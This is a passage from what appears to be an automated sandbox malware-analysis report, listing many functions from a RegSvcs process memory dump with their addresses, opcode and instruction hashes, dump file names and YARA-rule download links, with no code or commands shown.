                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction Fuzzy Hash: 61C002756019418BCF15DA59D694A4577E4B754740F151890E8058B721E624E811CA10
                                                                  Function 016D4340 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                  • Instruction ID: 40bcdfbd4ea1c420813955d6001ae75c38ceeaf954177ef336399aaa7c61bab8
                                                                  • Opcode Fuzzy Hash: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                  • Instruction Fuzzy Hash: 5C900231606800129140755C4C885474049A7E0301B55C111E4424A54DCA148A565361
                                                                  Function 016D4650 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                  • Instruction ID: 82ef257d0559fb3a29e9a6cd60a2fe59b7c60188afab8968266e96ae2a3277ec
                                                                  • Opcode Fuzzy Hash: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                  • Instruction Fuzzy Hash: D4900261602500424140755C4C084076049A7E1301395C215A4554A60DC61889559369
                                                                  Function 016D2BE0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                  • Instruction ID: 67a364fe8e14ed5632886f95e86cd4f5d87f07dfc5b7f13aaae13740efc2225f
                                                                  • Opcode Fuzzy Hash: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                  • Instruction Fuzzy Hash: B190023120644842D140755C4808A47005997D0305F55C111A4064B94ED6258E55B761
                                                                  Function 016D2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                  • Instruction ID: c3a34b5f254555c36356b5217c86ff3a484bd86302627ff31b4562c86115bac1
                                                                  • Opcode Fuzzy Hash: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                  • Instruction Fuzzy Hash: B090023120240802D180755C480864B004997D1301F95C115A4025B54ECA158B5977A1
                                                                  Function 016D2BA0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                  • Instruction ID: 232d4d706690b32cc14004843a87c5bee3c5946ef354eaa3bde78fae63c9391a
                                                                  • Opcode Fuzzy Hash: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                  • Instruction Fuzzy Hash: 4390023160640802D150755C4818747004997D0301F55C111A4024B54EC7558B5577A1
                                                                  Function 016D2B80 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                  • Instruction ID: 040f88c164f44f4adfd2eb92ce1a59921d1d4e6edc326dfb892bbf0a81c6ffa9
                                                                  • Opcode Fuzzy Hash: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                  • Instruction Fuzzy Hash: F790023120240802D104755C4C08687004997D0301F55C111AA024B55FD66589917231
                                                                  Function 016D2AF0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                  • Instruction ID: f6fe2125959c0eff1d856123e2189a418f0e19c6616de5229c81eea04104cfbd
                                                                  • Opcode Fuzzy Hash: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                  • Instruction Fuzzy Hash: E3900225222400020145B95C0A0850B0489A7D6351395C115F5416A90DC62189655321
                                                                  Function 016D2AD0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                  • Instruction ID: fbeb6e38e0f15ba1485f91c0f5dd7b6aab7dbfd053700c4e38834fbb000bb550
                                                                  • Opcode Fuzzy Hash: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                  • Instruction Fuzzy Hash: 58900225212400030105B95C0B08507008A97D5351355C121F5015A50DD62189615221
                                                                  Function 016D2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                  • Instruction ID: 701465d613ce9c61df5ae903ff70ee9e306711b72378145b538d3bc9442f934d
                                                                  • Opcode Fuzzy Hash: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                  • Instruction Fuzzy Hash: B69002A1202540924500B65C8808B0B454997E0201B55C116E5054A60DC52589519235
                                                                  Function 016D2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                  • Instruction ID: 486a48874a061be682f80485b46ce9e1ea673ed063d4ed8d84277817219d411a
                                                                  • Opcode Fuzzy Hash: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                  • Instruction Fuzzy Hash: C790022130240003D140755C581C6074049E7E1301F55D111E4414A54DD91589565322
                                                                  Function 016D2D00 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                  • Instruction ID: d6db4e49971f0015f753f2fa5e2880271e61bb6bce6948ddd62a7fe9c952ab98
                                                                  • Opcode Fuzzy Hash: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                  • Instruction Fuzzy Hash: 9190022120644442D100795C580CA07004997D0205F55D111A5064A95EC6358951A231
                                                                  Function 016D2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                  • Instruction ID: ce7f9a152cea4fc617bb2d5185193958331a3c5bc099e764255080d609a79892
                                                                  • Opcode Fuzzy Hash: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                  • Instruction Fuzzy Hash: 2590022921340002D180755C580C60B004997D1202F95D515A4015A58DC91589695321
                                                                  Function 016D2DD0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                  • Instruction ID: 418ae42a3089299a258ac27baf409d198cb57903cb854c0114405629dfbc5d13
                                                                  • Opcode Fuzzy Hash: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                  • Instruction Fuzzy Hash: DB900221243441525545B55C4808507404AA7E0241795C112A5414E50DC5269956D721
                                                                  Function 016D2DB0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                  • Instruction ID: c2d4875835202249071c6a66e61a2878d8394771e725bca2dd2aa50459ae8cc3
                                                                  • Opcode Fuzzy Hash: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                  • Instruction Fuzzy Hash: B690023124240402D141755C4808607004DA7D0241F95C112A4424A54FC6558B56AB61
                                                                  Function 016D2C60 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                  • Instruction ID: 15aab3dfc6eb210d79a611325900e5cd1e88454b55911327b49d8e5d947796ae
                                                                  • Opcode Fuzzy Hash: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                  • Instruction Fuzzy Hash: 5390023120240842D100755C4808B47004997E0301F55C116A4124B54EC615C9517621
                                                                  Function 016D2CF0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                                  • Instruction ID: 0cbb256049feda6ee57826decaae356b8c4ba4b9cca100548cf436e926352f7a
                                                                  • Opcode Fuzzy Hash: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                                  • Instruction Fuzzy Hash: E090023120240403D100755C590C707004997D0201F55D511A4424A58ED65689516221
                                                                  Function 016D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                                  • Instruction ID: f704e51f2afb24ec5544675b4a581932c02d94c67a0bb58546025a2d23608f54
                                                                  • Opcode Fuzzy Hash: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                                  • Instruction Fuzzy Hash: E990022160640402D140755C581C707005997D0201F55D111A4024A54EC6598B5567A1
                                                                  Function 016D2CA0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                                  • Instruction ID: b869a1ab81f0159d3bc93521e73188a656c628a9c7296d392623c7fcea6c0567
                                                                  • Opcode Fuzzy Hash: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                                  • Instruction Fuzzy Hash: 0690023120240402D100799C580C647004997E0301F55D111A9024A55FC66589916231
                                                                  Function 016D2F60 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                                  • Instruction ID: ea9a54c076c2736ed19a7cb4ccd9eb3caf8d221ffc09f17832a377a2f9085e0d
                                                                  • Opcode Fuzzy Hash: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                                  • Instruction Fuzzy Hash: 1C90026121240042D104755C4808707008997E1201F55C112A6154A54DC5298D615225
                                                                  Function 016D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                                  • Instruction ID: 894fb6dcd607ecbc9c3c32ff19d910e98946b7c5981f91292ffd82e02673c878
                                                                  • Opcode Fuzzy Hash: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                                  • Instruction Fuzzy Hash: 9190026134240442D100755C4818B070049D7E1301F55C115E5064A54EC619CD526226
                                                                  Function 016D2FE0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                                  • Instruction ID: 900fd6575e1e75818f0791e95d4b5c32515afb8c8203a722667dcf976d8474a8
                                                                  • Opcode Fuzzy Hash: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                                  • Instruction Fuzzy Hash: 26900221212C0042D200796C4C18B07004997D0303F55C215A4154A54DC91589615621
                                                                  Function 016D2FA0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                                  • Instruction ID: 648bb8252994846ce491aec10fda6e9a317f47828dcfb7b96a03b2446a43f20f
                                                                  • Opcode Fuzzy Hash: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                                  • Instruction Fuzzy Hash: 2490023120280402D100755C4C0C747004997D0302F55C111A9164A55FC665C9916631
                                                                  Function 016D2FB0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                                  • Instruction ID: 032bc80fc6fa715cf7073b431599936399b43ccdea7155d039d0274f888f9db8
                                                                  • Opcode Fuzzy Hash: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                                  • Instruction Fuzzy Hash: 46900221602400424140756C8C489074049BBE1211755C221A4998A50EC55989655765
                                                                  Function 016D2F90 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                                  • Instruction ID: b5b4ae7d2cbc1f6114c3a5438c225eb048d3008c4537e38c9c71ad3a7c85bc2e
                                                                  • Opcode Fuzzy Hash: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                                  • Instruction Fuzzy Hash: 7190023120280402D100755C4C1870B004997D0302F55C111A5164A55EC62589516671
                                                                  Function 016D2E30 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                                  • Instruction ID: 647220fea09f81b03be9b0750c41e3fe8ae09ebd120804047654dcc217af34bb
                                                                  • Opcode Fuzzy Hash: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                                  • Instruction Fuzzy Hash: 4690022130240402D102755C4818607004DD7D1345F95C112E5424A55EC6258A53A232
                                                                  Function 016D2EE0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                                  • Instruction ID: 73d9b1a9abc0de124fff56b5e22687d51ae209ce7fc866932e9cd977816fe1cb
                                                                  • Opcode Fuzzy Hash: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                                  • Instruction Fuzzy Hash: 1490026120280403D140795C4C08607004997D0302F55C111A6064A55FCA298D516235
                                                                  Function 016D2EA0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                                  • Instruction ID: 03d078a4c6a0c86822d3fef07523c463c000270fd9f2fe8087c0e946f4b3ec36
                                                                  • Opcode Fuzzy Hash: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                                  • Instruction Fuzzy Hash: 7590027120240402D140755C4808747004997D0301F55C111A9064A54FC6598ED56765
                                                                  Function 016D2E80 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                                  • Instruction ID: 08d7d9b25f7e0e8903b82d98c4785996383126a72bce5afa846d8425b377df2e
                                                                  • Opcode Fuzzy Hash: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                                  • Instruction Fuzzy Hash: 7990022160240502D101755C4808617004E97D0241F95C122A5024A55FCA258A92A231
                                                                  Function 016D3010 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                                  • Instruction ID: abda881e26f87180bd3075001964406442059f563fab1e071ff1154d29ad5777
                                                                  • Opcode Fuzzy Hash: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                                  • Instruction Fuzzy Hash: 1A90022120284442D140765C4C08B0F414997E1202F95C119A8156A54DC91589555721
                                                                  Function 016D3090 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                                  • Instruction ID: e7455696b937326ffb042207b8b1d10aa8f978fac1d165261194e7d6175c8ea8
                                                                  • Opcode Fuzzy Hash: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                                  • Instruction Fuzzy Hash: 0D90022124240802D140755C8818707004AD7D0601F55C111A4024A54EC6168A6567B1
                                                                  Function 016D39B0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
                                                                  • Instruction ID: 3460fb6c8b25ad5ac81b6f9e78c528e8ec355e4ec7ca9872febedda09ccb6ac1
                                                                  • Opcode Fuzzy Hash: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
                                                                  • Instruction Fuzzy Hash: 2A90022124645102D150755C48086174049B7E0201F55C121A4814A94EC55589556321
                                                                  Function 016D3D70 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
